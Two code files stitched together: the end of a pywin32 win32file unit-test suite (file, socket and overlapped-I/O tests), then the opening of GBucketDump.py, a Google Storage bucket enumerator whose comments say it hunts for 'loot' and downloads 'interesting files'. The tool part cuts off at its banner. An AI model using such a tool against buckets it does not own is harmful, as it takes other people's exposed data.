# Ensure we can read the data back.
win32file.SetFilePointer(h, 0, win32file.FILE_BEGIN)
hr, read_data = win32file.ReadFile(h, len(data)+10) # + 10 to get anything extra
self.failUnless(hr==0, "Readfile returned %d" % hr)
self.failUnless(read_data == data, "Read data is not what we wrote!")
# Now truncate the file at 1/2 its existing size.
newSize = len(data)//2
win32file.SetFilePointer(h, newSize, win32file.FILE_BEGIN)
win32file.SetEndOfFile(h)
self.failUnlessEqual(win32file.GetFileSize(h), newSize)
# GetFileAttributesEx/GetFileAttributesExW tests.
self.failUnlessEqual(win32file.GetFileAttributesEx(testName), win32file.GetFileAttributesExW(testName))
attr, ct, at, wt, size = win32file.GetFileAttributesEx(testName)
self.failUnless(size==newSize,
"Expected GetFileAttributesEx to return the same size as GetFileSize()")
self.failUnless(attr==win32file.GetFileAttributes(testName),
"Expected GetFileAttributesEx to return the same attributes as GetFileAttributes")
h = None # Close the file by removing the last reference to the handle!
self.failUnless(not os.path.isfile(testName), "After closing the file, it still exists!")
def testFilePointer(self):
# via [ 979270 ] SetFilePointer fails with negative offset
# Create a file in the %TEMP% directory.
filename = os.path.join( win32api.GetTempPath(), "win32filetest.dat" )
f = win32file.CreateFile(filename,
win32file.GENERIC_READ|win32file.GENERIC_WRITE,
0,
None,
win32file.CREATE_ALWAYS,
win32file.FILE_ATTRIBUTE_NORMAL,
0)
try:
#Write some data
data = str2bytes('Some data')
(res, written) = win32file.WriteFile(f, data)
self.failIf(res)
self.assertEqual(written, len(data))
#Move at the beginning and read the data
win32file.SetFilePointer(f, 0, win32file.FILE_BEGIN)
(res, s) = win32file.ReadFile(f, len(data))
self.failIf(res)
self.assertEqual(s, data)
#Move at the end and read the data
win32file.SetFilePointer(f, -len(data), win32file.FILE_END)
(res, s) = win32file.ReadFile(f, len(data))
self.failIf(res)
self.failUnlessEqual(s, data)
finally:
f.Close()
os.unlink(filename)
def testFileTimesTimezones(self):
if not issubclass(pywintypes.TimeType, datetime.datetime):
# maybe should report 'skipped', but that's not quite right as
# there is nothing you can do to avoid it being skipped!
return
filename = tempfile.mktemp("-testFileTimes")
now_utc = win32timezone.utcnow()
now_local = now_utc.astimezone(win32timezone.TimeZoneInfo.local())
h = win32file.CreateFile(filename,
win32file.GENERIC_READ|win32file.GENERIC_WRITE,
0, None, win32file.CREATE_ALWAYS, 0, 0)
try:
win32file.SetFileTime(h, now_utc, now_utc, now_utc)
ct, at, wt = win32file.GetFileTime(h)
self.failUnlessEqual(now_local, ct)
self.failUnlessEqual(now_local, at)
self.failUnlessEqual(now_local, wt)
# and the reverseCompose - set local, confirm against utc
win32file.SetFileTime(h, now_local, now_local, now_local)
ct, at, wt = win32file.GetFileTime(h)
self.failUnlessEqual(now_utc, ct)
self.failUnlessEqual(now_utc, at)
self.failUnlessEqual(now_utc, wt)
finally:
h.close()
os.unlink(filename)
def testFileTimes(self):
if issubclass(pywintypes.TimeType, datetime.datetime):
from win32timezone import TimeZoneInfo
now = datetime.datetime.now(tz=TimeZoneInfo.local())
nowish = now + datetime.timedelta(seconds=1)
later = now + datetime.timedelta(seconds=120)
else:
rc, tzi = win32api.GetTimeZoneInformation()
bias = tzi[0]
if rc==2: # daylight-savings is in effect.
bias += tzi[-1]
bias *= 60 # minutes to seconds...
tick = int(time.time())
now = pywintypes.Time(tick+bias)
nowish = pywintypes.Time(tick+bias+1)
later = pywintypes.Time(tick+bias+120)
filename = tempfile.mktemp("-testFileTimes")
# Windows docs the 'last time' isn't valid until the last write
# handle is closed - so create the file, then re-open it to confirm.
open(filename,"w").close()
f = win32file.CreateFile(filename, win32file.GENERIC_READ|win32file.GENERIC_WRITE,
0, None,
win32con.OPEN_EXISTING, 0, None)
try:
ct, at, wt = win32file.GetFileTime(f)
self.failUnless(ct >= now, "File was created in the past - now=%s, created=%s" % (now, ct))
self.failUnless( now <= ct <= nowish, (now, ct))
self.failUnless(wt >= now, "File was written-to in the past now=%s, written=%s" % (now,wt))
self.failUnless( now <= wt <= nowish, (now, wt))
# Now set the times.
win32file.SetFileTime(f, later, later, later)
# Get them back.
ct, at, wt = win32file.GetFileTime(f)
# XXX - the builtin PyTime type appears to be out by a dst offset.
# just ignore that type here...
if issubclass(pywintypes.TimeType, datetime.datetime):
self.failUnlessEqual(ct, later)
self.failUnlessEqual(at, later)
self.failUnlessEqual(wt, later)
finally:
f.Close()
os.unlink(filename)
class TestOverlapped(unittest.TestCase):
def testSimpleOverlapped(self):
# Create a file in the %TEMP% directory.
import win32event
testName = os.path.join( win32api.GetTempPath(), "win32filetest.dat" )
desiredAccess = win32file.GENERIC_WRITE
overlapped = pywintypes.OVERLAPPED()
evt = win32event.CreateEvent(None, 0, 0, None)
overlapped.hEvent = evt
# Create the file and write shit-loads of data to it.
h = win32file.CreateFile( testName, desiredAccess, 0, None, win32file.CREATE_ALWAYS, 0, 0)
chunk_data = str2bytes("z") * 0x8000
num_loops = 512
expected_size = num_loops * len(chunk_data)
for i in range(num_loops):
win32file.WriteFile(h, chunk_data, overlapped)
win32event.WaitForSingleObject(overlapped.hEvent, win32event.INFINITE)
overlapped.Offset = overlapped.Offset + len(chunk_data)
h.Close()
# Now read the data back overlapped
overlapped = pywintypes.OVERLAPPED()
evt = win32event.CreateEvent(None, 0, 0, None)
overlapped.hEvent = evt
desiredAccess = win32file.GENERIC_READ
h = win32file.CreateFile( testName, desiredAccess, 0, None, win32file.OPEN_EXISTING, 0, 0)
buffer = win32file.AllocateReadBuffer(0xFFFF)
while 1:
try:
hr, data = win32file.ReadFile(h, buffer, overlapped)
win32event.WaitForSingleObject(overlapped.hEvent, win32event.INFINITE)
overlapped.Offset = overlapped.Offset + len(data)
if not data is buffer:
self.fail("Unexpected result from ReadFile - should be the same buffer we passed it")
except win32api.error:
break
h.Close()
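# Editorial note (hedged): the completion-port tests below use the Win32 IOCP
# model - handles are associated with a port via CreateIoCompletionPort, and
# completed or posted operations are retrieved with GetQueuedCompletionStatus,
# which returns (errCode, numBytes, completionKey, overlapped).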
def testCompletionPortsMultiple(self):
# Mainly checking that we can "associate" an existing handle. This
# failed in build 203.
ioport = win32file.CreateIoCompletionPort(win32file.INVALID_HANDLE_VALUE,
0, 0, 0)
socks = []
for PORT in range(9123, 9125):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('', PORT))
sock.listen(1)
socks.append(sock)
new = win32file.CreateIoCompletionPort(sock.fileno(), ioport, PORT, 0)
assert new is ioport
for s in socks:
s.close()
hv = int(ioport)
ioport = new = None
# The handle itself should be closed now (unless we leak references!)
# Check that.
try:
win32file.CloseHandle(hv)
raise RuntimeError("Expected close to fail!")
except win32file.error, details:
self.failUnlessEqual(details.winerror, winerror.ERROR_INVALID_HANDLE)
def testCompletionPortsQueued(self):
class Foo: pass
io_req_port = win32file.CreateIoCompletionPort(-1, None, 0, 0)
overlapped = pywintypes.OVERLAPPED()
overlapped.object = Foo()
win32file.PostQueuedCompletionStatus(io_req_port, 0, 99, overlapped)
errCode, bytes, key, overlapped = \
win32file.GetQueuedCompletionStatus(io_req_port, win32event.INFINITE)
self.failUnlessEqual(errCode, 0)
self.failUnless(isinstance(overlapped.object, Foo))
def _IOCPServerThread(self, handle, port, drop_overlapped_reference):
overlapped = pywintypes.OVERLAPPED()
win32pipe.ConnectNamedPipe(handle, overlapped)
if drop_overlapped_reference:
# Be naughty - the overlapped object is now dead, but
# GetQueuedCompletionStatus will still find it. Our reference
# counting checks should catch that error.
overlapped = None
# even if we fail, be sure to close the handle; prevents hangs
# on Vista 64...
try:
self.failUnlessRaises(RuntimeError,
win32file.GetQueuedCompletionStatus, port, -1)
finally:
handle.Close()
return
result = win32file.GetQueuedCompletionStatus(port, -1)
ol2 = result[-1]
self.failUnless(ol2 is overlapped)
data = win32file.ReadFile(handle, 512)[1]
win32file.WriteFile(handle, data)
def testCompletionPortsNonQueued(self, test_overlapped_death = 0):
# In 204 we had a reference count bug when OVERLAPPED objects were
# associated with a completion port other than via
# PostQueuedCompletionStatus. This test is based on the reproduction
# reported with that bug.
# Create the pipe.
BUFSIZE = 512
pipe_name = r"\\.\pipe\pywin32_test_pipe"
handle = win32pipe.CreateNamedPipe(pipe_name,
win32pipe.PIPE_ACCESS_DUPLEX|
win32file.FILE_FLAG_OVERLAPPED,
win32pipe.PIPE_TYPE_MESSAGE|
win32pipe.PIPE_READMODE_MESSAGE|
win32pipe.PIPE_WAIT,
1, BUFSIZE, BUFSIZE,
win32pipe.NMPWAIT_WAIT_FOREVER,
None)
# Create an IOCP and associate it with the handle.
port = win32file.CreateIoCompletionPort(-1, 0, 0, 0)
win32file.CreateIoCompletionPort(handle, port, 1, 0)
t = threading.Thread(target=self._IOCPServerThread, args=(handle,port, test_overlapped_death))
t.setDaemon(True) # avoid hanging entire test suite on failure.
t.start()
try:
time.sleep(0.1) # let thread do its thing.
try:
win32pipe.CallNamedPipe(r"\\.\pipe\pywin32_test_pipe", str2bytes("Hello there"), BUFSIZE, 0)
except win32pipe.error:
# Testing for overlapped death causes this
if not test_overlapped_death:
raise
finally:
if not test_overlapped_death:
handle.Close()
t.join(3)
self.failIf(t.isAlive(), "thread didn't finish")
def testCompletionPortsNonQueuedBadReference(self):
self.testCompletionPortsNonQueued(True)
def testHashable(self):
overlapped = pywintypes.OVERLAPPED()
d = {}
d[overlapped] = "hello"
self.failUnlessEqual(d[overlapped], "hello")
def testComparable(self):
overlapped = pywintypes.OVERLAPPED()
self.failUnlessEqual(overlapped, overlapped)
# ensure we explicitly test the operators.
self.failUnless(overlapped == overlapped)
self.failIf(overlapped != overlapped)
def testComparable2(self):
# 2 overlapped objects compare equal if their contents are the same.
overlapped1 = pywintypes.OVERLAPPED()
overlapped2 = pywintypes.OVERLAPPED()
self.failUnlessEqual(overlapped1, overlapped2)
# ensure we explicitly test the operators.
self.failUnless(overlapped1 == overlapped2)
self.failIf(overlapped1 != overlapped2)
# now change something in one of them - should no longer be equal.
overlapped1.hEvent = 1
self.failIfEqual(overlapped1, overlapped2)
# ensure we explicitly test the operators.
self.failIf(overlapped1 == overlapped2)
self.failUnless(overlapped1 != overlapped2)
class TestSocketExtensions(unittest.TestCase):
def acceptWorker(self, port, running_event, stopped_event):
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.bind(('', port))
listener.listen(200)
# create accept socket
accepter = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# An overlapped
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
# accept the connection.
# We used to allow strings etc to be passed here, and they would be
# modified! Obviously this is evil :)
buffer = " " * 1024 # EVIL - SHOULD NOT BE ALLOWED.
self.assertRaises(TypeError, win32file.AcceptEx, listener, accepter, buffer, overlapped)
# This is the correct way to allocate the buffer...
buffer = win32file.AllocateReadBuffer(1024)
rc = win32file.AcceptEx(listener, accepter, buffer, overlapped)
self.failUnlessEqual(rc, winerror.ERROR_IO_PENDING)
# Set the event to say we are all ready
running_event.set()
# and wait for the connection.
rc = win32event.WaitForSingleObject(overlapped.hEvent, 2000)
if rc == win32event.WAIT_TIMEOUT:
self.fail("timed out waiting for a connection")
nbytes = win32file.GetOverlappedResult(listener.fileno(), overlapped, False)
#fam, loc, rem = win32file.GetAcceptExSockaddrs(accepter, buffer)
accepter.send(buffer[:nbytes])
# NOT set in a finally - this means *successfully* stopped!
stopped_event.set()
def testAcceptEx(self):
port = 4680
running = threading.Event()
stopped = threading.Event()
t = threading.Thread(target=self.acceptWorker, args=(port, running,stopped))
t.start()
running.wait(2)
if not running.isSet():
self.fail("AcceptEx Worker thread failed to start")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', port))
win32file.WSASend(s, str2bytes("hello"), None)
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
# Like above - WSARecv used to allow strings as the receive buffer!!
buffer = " " * 10
self.assertRaises(TypeError, win32file.WSARecv, s, buffer, overlapped)
# This one should work :)
buffer = win32file.AllocateReadBuffer(10)
win32file.WSARecv(s, buffer, overlapped)
nbytes = win32file.GetOverlappedResult(s.fileno(), overlapped, True)
got = buffer[:nbytes]
self.failUnlessEqual(got, str2bytes("hello"))
# thread should have stopped
stopped.wait(2)
if not stopped.isSet():
self.fail("AcceptEx Worker thread failed to successfully stop")
class TestFindFiles(unittest.TestCase):
def testIter(self):
dir = os.path.join(os.getcwd(), "*")
files = win32file.FindFilesW(dir)
set1 = set()
set1.update(files)
set2 = set()
for file in win32file.FindFilesIterator(dir):
set2.add(file)
assert len(set2) > 5, "This directory has less than 5 files!?"
self.failUnlessEqual(set1, set2)
def testBadDir(self):
dir = os.path.join(os.getcwd(), "a dir that doesnt exist", "*")
self.assertRaises(win32file.error, win32file.FindFilesIterator, dir)
def testEmptySpec(self):
spec = os.path.join(os.getcwd(), "*.foo_bar")
num = 0
for i in win32file.FindFilesIterator(spec):
num += 1
self.failUnlessEqual(0, num)
def testEmptyDir(self):
test_path = os.path.join(win32api.GetTempPath(), "win32file_test_directory")
try:
# Note: previously used shutil.rmtree, but when looking for
# reference count leaks, that function showed leaks! os.rmdir
# doesn't have that problem.
os.rmdir(test_path)
except os.error:
pass
os.mkdir(test_path)
try:
num = 0
for i in win32file.FindFilesIterator(os.path.join(test_path, "*")):
num += 1
# Expecting "." and ".." only
self.failUnlessEqual(2, num)
finally:
os.rmdir(test_path)
class TestDirectoryChanges(unittest.TestCase):
num_test_dirs = 1
def setUp(self):
self.watcher_threads = []
self.watcher_thread_changes = []
self.dir_names = []
self.dir_handles = []
for i in range(self.num_test_dirs):
td = tempfile.mktemp("-test-directory-changes-%d" % i)
os.mkdir(td)
self.dir_names.append(td)
hdir = win32file.CreateFile(td,
ntsecuritycon.FILE_LIST_DIRECTORY,
win32con.FILE_SHARE_READ,
None, # security desc
win32con.OPEN_EXISTING,
win32con.FILE_FLAG_BACKUP_SEMANTICS |
win32con.FILE_FLAG_OVERLAPPED,
None)
self.dir_handles.append(hdir)
changes = []
t = threading.Thread(target=self._watcherThreadOverlapped,
args=(td, hdir, changes))
t.start()
self.watcher_threads.append(t)
self.watcher_thread_changes.append(changes)
def _watcherThread(self, dn, dh, changes):
# A synchronous version:
# XXX - not used - I was having a whole lot of problems trying to
# get this to work. Specifically:
# * ReadDirectoryChangesW without an OVERLAPPED blocks infinitely.
# * If another thread attempts to close the handle while
# ReadDirectoryChangesW is waiting on it, the ::CloseHandle() method
# blocks (which has nothing to do with the GIL - it is correctly
# managed)
# Which ends up with no way to kill the thread!
flags = win32con.FILE_NOTIFY_CHANGE_FILE_NAME
while 1:
try:
print "waiting", dh
changes = win32file.ReadDirectoryChangesW(dh,
8192,
False, #sub-tree
flags)
print "got", changes
except:
raise
changes.extend(changes)
def _watcherThreadOverlapped(self, dn, dh, changes):
flags = win32con.FILE_NOTIFY_CHANGE_FILE_NAME
buf = win32file.AllocateReadBuffer(8192)
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
while 1:
win32file.ReadDirectoryChangesW(dh,
buf,
False, #sub-tree
flags,
overlapped)
# Wait for our event, or for 5 seconds.
rc = win32event.WaitForSingleObject(overlapped.hEvent, 5000)
if rc == win32event.WAIT_OBJECT_0:
# got some data! Must use GetOverlappedResult to find out
# how much is valid! 0 generally means the handle has
# been closed. Blocking is OK here, as the event has
# already been set.
nbytes = win32file.GetOverlappedResult(dh, overlapped, True)
if nbytes:
bits = win32file.FILE_NOTIFY_INFORMATION(buf, nbytes)
changes.extend(bits)
else:
# This is "normal" exit - our 'tearDown' closes the
# handle.
# print "looks like dir handle was closed!"
return
else:
print "ERROR: Watcher thread timed-out!"
return # kill the thread!
def tearDown(self):
# be careful about raising errors at teardown!
for h in self.dir_handles:
# See comments in _watcherThread above - this appears to
# deadlock if a synchronous ReadDirectoryChangesW is waiting...
# (No such problems with an asynch ReadDirectoryChangesW)
h.Close()
for dn in self.dir_names:
try:
shutil.rmtree(dn)
except OSError:
print "FAILED to remove directory", dn
for t in self.watcher_threads:
# closing dir handle should have killed threads!
t.join(5)
if t.isAlive():
print "FAILED to wait for thread termination"
def stablize(self):
time.sleep(0.5)
def testSimple(self):
self.stablize()
for dn in self.dir_names:
fn = os.path.join(dn, "test_file")
open(fn, "w").close()
self.stablize()
changes = self.watcher_thread_changes[0]
self.failUnlessEqual(changes, [(1, "test_file")])
def testSmall(self):
self.stablize()
for dn in self.dir_names:
fn = os.path.join(dn, "x")
open(fn, "w").close()
self.stablize()
changes = self.watcher_thread_changes[0]
self.failUnlessEqual(changes, [(1, "x")])
class TestEncrypt(unittest.TestCase):
def testEncrypt(self):
fname = tempfile.mktemp("win32file_test")
f = open(fname, "wb")
f.write(str2bytes("hello"))
f.close()
f = None
try:
try:
win32file.EncryptFile(fname)
except win32file.error, details:
if details.winerror != winerror.ERROR_ACCESS_DENIED:
raise
print "It appears this is not NTFS - cant encrypt/decrypt"
win32file.DecryptFile(fname)
finally:
if f is not None:
f.close()
os.unlink(fname)
class TestConnect(unittest.TestCase):
def connect_thread_runner(self, expect_payload, giveup_event):
# As Windows 2000 doesn't do ConnectEx, we need to use a non-blocking
# accept, as our test connection may never come. May as well use
# AcceptEx for this...
listener = socket.socket()
self.addr = ('localhost', random.randint(10000,64000))
listener.bind(self.addr)
listener.listen(1)
# create accept socket
accepter = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# An overlapped
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
# accept the connection.
if expect_payload:
buf_size = 1024
else:
# when we don't expect data we must be careful to only pass the
# exact number of bytes for the endpoint data...
buf_size = win32file.CalculateSocketEndPointSize(listener)
buffer = win32file.AllocateReadBuffer(buf_size)
win32file.AcceptEx(listener, accepter, buffer, overlapped)
# wait for the connection or our test to fail.
events = giveup_event, overlapped.hEvent
rc = win32event.WaitForMultipleObjects(events, False, 2000)
if rc == win32event.WAIT_TIMEOUT:
self.fail("timed out waiting for a connection")
if rc == win32event.WAIT_OBJECT_0:
# Our main thread running the test failed and will never connect.
return
# must be a connection.
nbytes = win32file.GetOverlappedResult(listener.fileno(), overlapped, False)
if expect_payload:
self.request = buffer[:nbytes]
accepter.send(str2bytes('some expected response'))
def test_connect_with_payload(self):
giveup_event = win32event.CreateEvent(None, 0, 0, None)
t = threading.Thread(target=self.connect_thread_runner,
args=(True, giveup_event))
t.start()
time.sleep(0.1)
s2 = socket.socket()
ol = pywintypes.OVERLAPPED()
s2.bind(('0.0.0.0', 0)) # connectex requires the socket be bound beforehand
try:
win32file.ConnectEx(s2, self.addr, ol, str2bytes("some expected request"))
except win32file.error, exc:
win32event.SetEvent(giveup_event)
if exc.winerror == 10022: # WSAEINVAL
raise TestSkipped("ConnectEx is not available on this platform")
raise # some error we don't expect.
win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
buff = win32file.AllocateReadBuffer(1024)
win32file.WSARecv(s2, buff, ol, 0)
length = win32file.GetOverlappedResult(s2.fileno(), ol, 1)
self.response = buff[:length]
self.assertEqual(self.response, str2bytes('some expected response'))
self.assertEqual(self.request, str2bytes('some expected request'))
t.join(5)
self.failIf(t.isAlive(), "worker thread didn't terminate")
def test_connect_without_payload(self):
giveup_event = win32event.CreateEvent(None, 0, 0, None)
t = threading.Thread(target=self.connect_thread_runner,
args=(False, giveup_event))
t.start()
time.sleep(0.1)
s2 = socket.socket()
ol = pywintypes.OVERLAPPED()
s2.bind(('0.0.0.0', 0)) # connectex requires the socket be bound beforehand
try:
win32file.ConnectEx(s2, self.addr, ol)
except win32file.error, exc:
win32event.SetEvent(giveup_event)
if exc.winerror == 10022: # WSAEINVAL
raise TestSkipped("ConnectEx is not available on this platform")
raise # some error we don't expect.
win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
buff = win32file.AllocateReadBuffer(1024)
win32file.WSARecv(s2, buff, ol, 0)
length = win32file.GetOverlappedResult(s2.fileno(), ol, 1)
self.response = buff[:length]
self.assertEqual(self.response, str2bytes('some expected response'))
t.join(5)
self.failIf(t.isAlive(), "worker thread didn't terminate")
class TestTransmit(unittest.TestCase):
def test_transmit(self):
import binascii
bytes = os.urandom(1024*1024)
val = binascii.hexlify(bytes)
val_length = len(val)
f = tempfile.TemporaryFile()
f.write(val)
def runner():
s1 = socket.socket()
self.addr = ('localhost', random.randint(10000,64000))
s1.bind(self.addr)
s1.listen(1)
cli, addr = s1.accept()
buf = 1
self.request = []
while buf:
buf = cli.recv(1024*100)
self.request.append(buf)
th = threading.Thread(target=runner)
th.start()
time.sleep(0.5)
s2 = socket.socket()
s2.connect(self.addr)
length = 0
aaa = str2bytes("[AAA]")
bbb = str2bytes("[BBB]")
ccc = str2bytes("[CCC]")
ddd = str2bytes("[DDD]")
empty = str2bytes("")
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, aaa, bbb)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, empty, empty)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, None, ccc)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, ddd)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
s2.close()
th.join()
buf = str2bytes('').join(self.request)
self.assertEqual(length, len(buf))
expected = val + aaa + val + bbb + val + val + ccc + ddd + val
self.assertEqual(type(expected), type(buf))
self.assert_(expected == buf)
class TestWSAEnumNetworkEvents(unittest.TestCase):
def test_basics(self):
s = socket.socket()
e = win32event.CreateEvent(None, 1, 0, None)
win32file.WSAEventSelect(s, e, 0)
self.assertEquals(win32file.WSAEnumNetworkEvents(s), {})
self.assertEquals(win32file.WSAEnumNetworkEvents(s, e), {})
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, s, e, 3)
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, s, "spam")
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, "spam", e)
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, "spam")
f = open("NUL")
h = win32file._get_osfhandle(f.fileno())
self.assertRaises(win32file.error, win32file.WSAEnumNetworkEvents, h)
self.assertRaises(win32file.error, win32file.WSAEnumNetworkEvents, s, h)
try:
win32file.WSAEnumNetworkEvents(h)
except win32file.error, e:
self.assertEquals(e.winerror, win32file.WSAENOTSOCK)
try:
win32file.WSAEnumNetworkEvents(s, h)
except win32file.error, e:
# According to the docs it would seem reasonable that
# this would fail with WSAEINVAL, but it doesn't.
self.assertEquals(e.winerror, win32file.WSAENOTSOCK)
def test_functional(self):
# This is not really a unit test, but it does exercise the code
# quite well and can serve as an example of WSAEventSelect and
# WSAEnumNetworkEvents usage.
port = socket.socket()
port.setblocking(0)
port_event = win32event.CreateEvent(None, 0, 0, None)
win32file.WSAEventSelect(port, port_event,
win32file.FD_ACCEPT |
win32file.FD_CLOSE)
port.bind(("127.0.0.1", 0))
port.listen(10)
client = socket.socket()
client.setblocking(0)
client_event = win32event.CreateEvent(None, 0, 0, None)
win32file.WSAEventSelect(client, client_event,
win32file.FD_CONNECT |
win32file.FD_READ |
win32file.FD_WRITE |
win32file.FD_CLOSE)
err = client.connect_ex(port.getsockname())
self.assertEquals(err, win32file.WSAEWOULDBLOCK)
res = win32event.WaitForSingleObject(port_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(port, port_event)
self.assertEquals(events, {win32file.FD_ACCEPT: 0})
server, addr = port.accept()
server.setblocking(0)
server_event = win32event.CreateEvent(None, 1, 0, None)
win32file.WSAEventSelect(server, server_event,
win32file.FD_READ |
win32file.FD_WRITE |
win32file.FD_CLOSE)
res = win32event.WaitForSingleObject(server_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(server, server_event)
self.assertEquals(events, {win32file.FD_WRITE: 0})
res = win32event.WaitForSingleObject(client_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(client, client_event)
self.assertEquals(events, {win32file.FD_CONNECT: 0,
win32file.FD_WRITE: 0})
sent = 0
data = str2bytes("x") * 16 * 1024
while sent < 16 * 1024 * 1024:
try:
sent += client.send(data)
except socket.error, e:
if e.args[0] == win32file.WSAEINTR:
continue
elif e.args[0] in (win32file.WSAEWOULDBLOCK, win32file.WSAENOBUFS):
break
else:
raise
else:
self.fail("could not find socket buffer limit")
events = win32file.WSAEnumNetworkEvents(client)
self.assertEquals(events, {})
res = win32event.WaitForSingleObject(server_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(server, server_event)
self.assertEquals(events, {win32file.FD_READ: 0})
received = 0
while received < sent:
try:
received += len(server.recv(16 * 1024))
except socket.error, e:
if e.args[0] in [win32file.WSAEINTR, win32file.WSAEWOULDBLOCK]:
continue
else:
raise
self.assertEquals(received, sent)
events = win32file.WSAEnumNetworkEvents(server)
self.assertEquals(events, {})
res = win32event.WaitForSingleObject(client_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(client, client_event)
self.assertEquals(events, {win32file.FD_WRITE: 0})
client.shutdown(socket.SHUT_WR)
res = win32event.WaitForSingleObject(server_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
# strange timing issues...
for i in range(5):
events = win32file.WSAEnumNetworkEvents(server, server_event)
if events: break
win32api.Sleep(100)
else:
raise AssertionError("failed to get events")
self.assertEquals(events, {win32file.FD_CLOSE: 0})
events = win32file.WSAEnumNetworkEvents(client)
self.assertEquals(events, {})
server.close()
res = win32event.WaitForSingleObject(client_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(client, client_event)
self.assertEquals(events, {win32file.FD_CLOSE: 0})
client.close()
events = win32file.WSAEnumNetworkEvents(port)
self.assertEquals(events, {})
if __name__ == '__main__':
testmain()
|
GBucketDump.py
|
#!/usr/bin/env python
# GBucketDump is a tool to quickly enumerate Google Storage buckets to look for loot.
# It's similar to a subdomain bruteforcer but is made specifically for Google Storage
# buckets and also has some extra features that allow you to grep for
# delicious files as well as download interesting files if you're not
# afraid to quickly fill up your hard drive.
# Andy from @Netscylla
# Forked from original AWSBucketDump code by Jordan Potti @ok_bye_now
from argparse import ArgumentParser
import codecs
import requests
import xmltodict
import sys
import os
import shutil
import traceback
from queue import Queue
from threading import Thread, Lock
bucket_q = Queue()
download_q = Queue()
grep_list=None
arguments = None
def fetch(url):
print('fetching ' + url)
response = requests.get(url)
if response.status_code == 403 or response.status_code == 404:
status403(url)
if response.status_code == 200:
if "Content" in response.text:
status200(response, grep_list, url)
def bucket_worker():
while True:
item = bucket_q.get()
try:
fetch(item)
except Exception as e:
traceback.print_exc(file=sys.stdout)
print(e)
bucket_q.task_done()
def downloadWorker():
print('download worker running')
while True:
item = download_q.get()
try:
downloadFile(item)
except Exception as e:
traceback.print_exc(file=sys.stdout)
print(e)
download_q.task_done()
directory_lock = Lock()
def get_directory_lock():
directory_lock.acquire()
def release_directory_lock():
directory_lock.release()
def get_make_directory_return_filename_path(url):
global arguments
bits = url.split('/')
directory = arguments.savedir
for i in range(2,len(bits)-1):
directory = os.path.join(directory, bits[i])
try:
get_directory_lock()
if not os.path.isdir(directory):
os.makedirs(directory)
except Exception as e:
traceback.print_exc(file=sys.stdout)
print(e)
finally:
release_directory_lock()
return os.path.join(directory, bits[-1]).rstrip()
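# Illustrative example of the mapping above (paths are assumptions, not output
# from the tool): with arguments.savedir == "loot", the object
#   http://storage.googleapis.com/some-bucket/backups/db.sql
# is written to
#   loot/storage.googleapis.com/some-bucket/backups/db.sql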
interesting_file_lock = Lock()
def get_interesting_file_lock():
interesting_file_lock.acquire()
def release_interesting_file_lock():
interesting_file_lock.release()
def write_interesting_file(filepath):
try:
get_interesting_file_lock()
with open('interesting_file.txt', 'ab+') as interesting_file:
interesting_file.write(filepath.encode('utf-8'))
interesting_file.write('\n'.encode('utf-8'))
finally:
release_interesting_file_lock()
def downloadFile(filename):
global arguments
print('Downloading {}'.format(filename))
local_path = get_make_directory_return_filename_path(filename)
local_filename = (filename.split('/')[-1]).rstrip()
print('local {}'.format(local_path))
if local_filename =="":
print("Directory..\n")
else:
r = requests.get(filename.rstrip(), stream=True)
if 'Content-Length' in r.headers:
if int(r.headers['Content-Length']) > arguments.maxsize:
print("This file is greater than the specified max size.. skipping..\n")
else:
with open(local_path, 'wb') as f:
shutil.copyfileobj(r.raw, f)
r.close()
def print_banner():
print('''\nDescription:
GBucketDump is a tool to quickly enumerate Google Storage buckets to look for loot.
It's similar to a subdomain bruteforcer but is made specifically for Storage
buckets and also has some extra features that allow you to grep for
delicious files as well as download interesting files if you're not
afraid to quickly fill up your hard drive.
